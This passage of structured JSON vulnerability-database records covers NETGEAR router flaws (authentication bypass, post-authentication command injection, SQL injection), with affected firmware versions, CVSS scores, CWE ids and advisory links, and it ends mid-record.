"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116748"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18743"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051512/security-advisory-for-authentication-bypass-on-some-routers-psv-2017-0330"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18743"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1985"
},
{
"date": "2020-04-23T16:15:12.617000",
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1985"
},
{
"date": "2024-11-21T03:20:48.853000",
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
}
],
"trust": 0.6
}
}
var-202108-1625
Vulnerability from variot
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40. Netgear NETGEAR is a router from Netgear. A hardware device that connects two or more networks and acts as a gateway between the networks.
Many NETGEAR devices have security vulnerabilities. The vulnerability stems from the fact that the product does not filter special characters in user input data. Attackers can execute system commands through this vulnerability. This affects R6250 prior to 1.0.4.36, R6300v2 prior to 1.0.4.36, R6400 prior to 1.0.1.50, R6400v2 prior to 1.0.2.66, R6700v3 prior to 1.0.2.66, R6700 prior to 1.0.2.8, R6900 prior to 1.0.2.8, R7000 prior to 1.0.9.88, R6900P prior to 1.3.2.132, R7100LG prior to 1.0.0.52, R7900 prior to 1.0.3.10, R8000 prior to 1.0.4.46, R7900P prior to 1.4.1.50, R8000P prior to 1.4.1.50, and RAX80 prior to 1.0.1.40
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-1625",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.46"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.8"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.8"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.2.132"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.50"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.50"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.36"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.36"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.88"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.40"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"cve": "CVE-2021-38519",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-38519",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2021-83557",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-38519",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2021-38519",
"impactScore": 5.5,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-38519",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2021-38519",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2021-83557",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-956",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-38519",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "VULMON",
"id": "CVE-2021-38519"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
},
{
"db": "NVD",
"id": "CVE-2021-38519"
},
{
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40. Netgear NETGEAR is a router from Netgear. A hardware device that connects two or more networks and acts as a gateway between the networks. \n\r\n\r\nMany NETGEAR devices have security vulnerabilities. The vulnerability stems from the fact that the product does not filter special characters in user input data. Attackers can execute system commands through this vulnerability. This affects R6250 prior to 1.0.4.36, R6300v2 prior to 1.0.4.36, R6400 prior to 1.0.1.50, R6400v2 prior to 1.0.2.66, R6700v3 prior to 1.0.2.66, R6700 prior to 1.0.2.8, R6900 prior to 1.0.2.8, R7000 prior to 1.0.9.88, R6900P prior to 1.3.2.132, R7100LG prior to 1.0.0.52, R7900 prior to 1.0.3.10, R8000 prior to 1.0.4.46, R7900P prior to 1.4.1.50, R8000P prior to 1.4.1.50, and RAX80 prior to 1.0.1.40",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38519"
},
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "VULMON",
"id": "CVE-2021-38519"
}
],
"trust": 1.53
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-38519",
"trust": 2.3
},
{
"db": "CNVD",
"id": "CNVD-2021-83557",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202108-956",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-38519",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "VULMON",
"id": "CVE-2021-38519"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
},
{
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"id": "VAR-202108-1625",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
}
],
"trust": 0.9927831599999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
}
]
},
"last_update_date": "2024-08-14T14:50:11.928000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for Command injection vulnerabilities in multiple NETGEAR devices (CNVD-2021-83557)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/296406"
},
{
"title": "Netgear NETGEAR Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=159350"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000063762/security-advisory-for-post-authentication-command-injection-on-some-routers-psv-2018-0564"
},
{
"trust": 1.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38519"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "VULMON",
"id": "CVE-2021-38519"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
},
{
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"db": "VULMON",
"id": "CVE-2021-38519"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
},
{
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"date": "2021-08-11T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38519"
},
{
"date": "2021-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-956"
},
{
"date": "2021-08-11T00:15:40.490000",
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-83557"
},
{
"date": "2021-08-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38519"
},
{
"date": "2021-08-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-956"
},
{
"date": "2021-08-19T11:31:24.787000",
"db": "NVD",
"id": "CVE-2021-38519"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection vulnerabilities in multiple NETGEAR devices (CNVD-2021-83557)",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-83557"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-956"
}
],
"trust": 0.6
}
}
var-202004-0802
Vulnerability from variot
Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56. plural NETGEAR On the device SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0802",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.66"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.16"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.16"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.24"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.102"
},
{
"model": "ex8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.118"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r8900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.6"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.40"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.16"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.118"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.28"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.1.00.28"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dc112a",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
